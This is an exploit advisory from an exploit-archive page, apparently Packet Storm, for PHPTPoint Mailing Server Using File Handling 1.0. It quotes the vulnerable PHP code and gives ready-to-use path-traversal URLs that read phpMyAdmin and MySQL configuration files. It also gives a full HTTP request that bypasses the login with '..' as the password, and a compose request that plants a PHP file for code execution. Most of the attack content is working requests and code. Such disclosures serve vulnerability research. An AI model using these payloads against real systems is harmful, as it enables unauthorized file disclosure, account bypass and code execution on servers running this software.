exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHPTPoint Mailing Server Using File Handling 1.0 Arbitrary File Read

PHPTPoint Mailing Server Using File Handling 1.0 Arbitrary File Read
Posted Oct 26, 2018
Authored by Boumediene Kaddour

PHPTPoint Mailing Server Using File Handling version 1.0 suffers from an arbitrary file read vulnerability.

tags | exploit, arbitrary
SHA-256 | e02f2013b71c60f2a80ccd5a9984a80a1cbfe95a3f23088757c3b8ecb0e3270f

PHPTPoint Mailing Server Using File Handling 1.0 Arbitrary File Read

Change Mirror Download
# Exploit Title:  phptpoint Mailing Server Using File Handling 1.0 -
Arbitrary File Read
# Date: 2018-10-25
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.phptpoint.com/
# Software Link: https://www.phptpoint.com/projects/ignou-mca-projects/
# Version: 1.0
# Tested on: WAMP windows 10 x64
# CVE: unknown

# Description :
# phptpoint Mailing Server Using File Handling 1.0 suffers from multiple
Arbitrary File Read vulnerabilities in different sections that allow an
attacker to read sensitive files on the system, and so bypassing the login
page.

# Vulnerable Code:home.php

125 //for inbox
126 $coninb=$_GET['coninb'];
127 if(isset($coninb))
128 {
129 $fo=fopen("User_Data/$user/inbox/$coninb","r");
130 $filesize=filesize("User_Data/$user/inbox/$coninb");
131 $msg=fread($fo,$filesize);
132 echo $msg;
133 }

# PoC:
view-source:
http://127.0.0.1/Mailserver_filesystem/home.php?coninb=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php
http://127.0.0.1/Mailserver_filesystem/home.php?coninb=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini


134 //for sent
135 $consent=$_GET['consent'];
136 if(isset($consent))
137 {
138 $fo=fopen("User_Data/$user/sent/$consent","r");
139 $filesize=filesize("User_Data/$user/sent/$consent");
140 $msg=fread($fo,$filesize);
141 echo $msg;
142 }
# PoC:
view-source:
http://127.0.0.1/Mailserver_filesystem/home.php?consent=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php
http://127.0.0.1/Mailserver_filesystem/home.php?consent=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini
143 //for trash
144 $contrsh=$_GET['contrs'];
145 if(isset($contrsh))
146 {
147 $fo=fopen("User_Data/$user/trash/$contrsh","r");
148 $filesize=filesize("User_Data/$user/trash/$contrsh");
149 $msg=fread($fo,$filesize);
150 echo $msg;
151 }

# PoC:
view-source:
http://127.0.0.1/Mailserver_filesystem/home.php?contrs=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php
http://127.0.0.1/Mailserver_filesystem/home.php?contrh=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini

152 //for trash
153 $condrft=$_GET['condrft'];
154 if(isset($condrft))
155 {
156 $fo=fopen("User_Data/$user/draft/$condrft","r");
157 $filesize=filesize("User_Data/$user/draft/$condrft");
158 $msg=fread($fo,$filesize);
159 echo $msg;
160 }

# PoC:
view-source:
http://127.0.0.1/Mailserver_filesystem/home.php?condrft=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php
http://127.0.0.1/Mailserver_filesystem/home.php?condrft=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini

161 //for spam
162 $conspam=$_GET['conspam'];
163 if(isset($conspam))
164 {
165 $fo=fopen("User_Data/$user/draft/$conspam","r");
166 $filesize=filesize("User_Data/$user/draft/$conspam");
167 $msg=fread($fo,$filesize);
168 echo $msg;
169 }
# PoC:
view-source:
http://127.0.0.1/Mailserver_filesystem/home.php?conspam=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php
http://127.0.0.1/Mailserver_filesystem/home.php?conspam=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini



# Bypass Login page.
Sicne . and .. are considered as directories in Operations Systems, we can
pass any valid username and a valid directory or file on the system, which
will be considered as a valid password.
Vulnerable Code: login.php

6 if(isset($_POST['l']))
7 {
8 $email=$_POST['e'];
9 $pass=$_POST['p'];
10 if(file_exists("User_Data/$email") &&
file_exists("User_Data/$email/$pass"))
11 {
12 $_SESSION['user']=$email;
13 //header('location:home.php');
14 echo "<script>window.location='home.php'</script>";
15 }
16 else
17 {
18 echo "<h1 align='center'><font color='green' face='cursive'>Invalid
User</font></h1>";
19 }


# PoC:

POST /Mailserver_filesystem/index.php?option=login HTTP/1.1
Host: 172.16.122.4
Content-Length: 328
Cache-Control: max-age=0
Origin: http://172.16.122.4
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryj3oDIRYA36Vt2dpb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.122.4/Mailserver_filesystem/index.php?option=login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
Cookie: resolve_ids=0; order_dir_list_by=1A;
PHPSESSIDwebERPteam=aaktuhmrlihn8c8v5pvscj62j5;
PHPSESSID=usnk2tfmjjp74ffpuqbfh9hvn1
Connection: close

------WebKitFormBoundaryj3oDIRYA36Vt2dpb
Content-Disposition: form-data; name="e"

hacker@ps.com
------WebKitFormBoundaryj3oDIRYA36Vt2dpb
Content-Disposition: form-data; name="p"

..
------WebKitFormBoundaryj3oDIRYA36Vt2dpb
Content-Disposition: form-data; name="l"

Login
------WebKitFormBoundaryj3oDIRYA36Vt2dpb--


# Arbitrary File upload to code execution


http://172.16.122.4/Mailserver_filesystem/User_Data/hacker@ps.com/inbox/abc@ps.com%20.php

POST /Mailserver_filesystem/home.php?option=compose HTTP/1.1
Host: 172.16.122.4
Content-Length: 75
Cache-Control: max-age=0
Origin: http://172.16.122.4
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.122.4/Mailserver_filesystem/home.php?option=compose
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
Cookie: resolve_ids=0; order_dir_list_by=1A;
PHPSESSIDwebERPteam=aaktuhmrlihn8c8v5pvscj62j5;
PHPSESSID=usnk2tfmjjp74ffpuqbfh9hvn1
Connection: close

to=hacker@ps.com&sub=.php&msg=<?php phpinfo(); ?>&send=Send


# You can access the php file via this link.

http://yourIP/Mailserver_filesystem/User_Data/hacker@ps.com/inbox/hacker@ps.com.php
Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    66 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close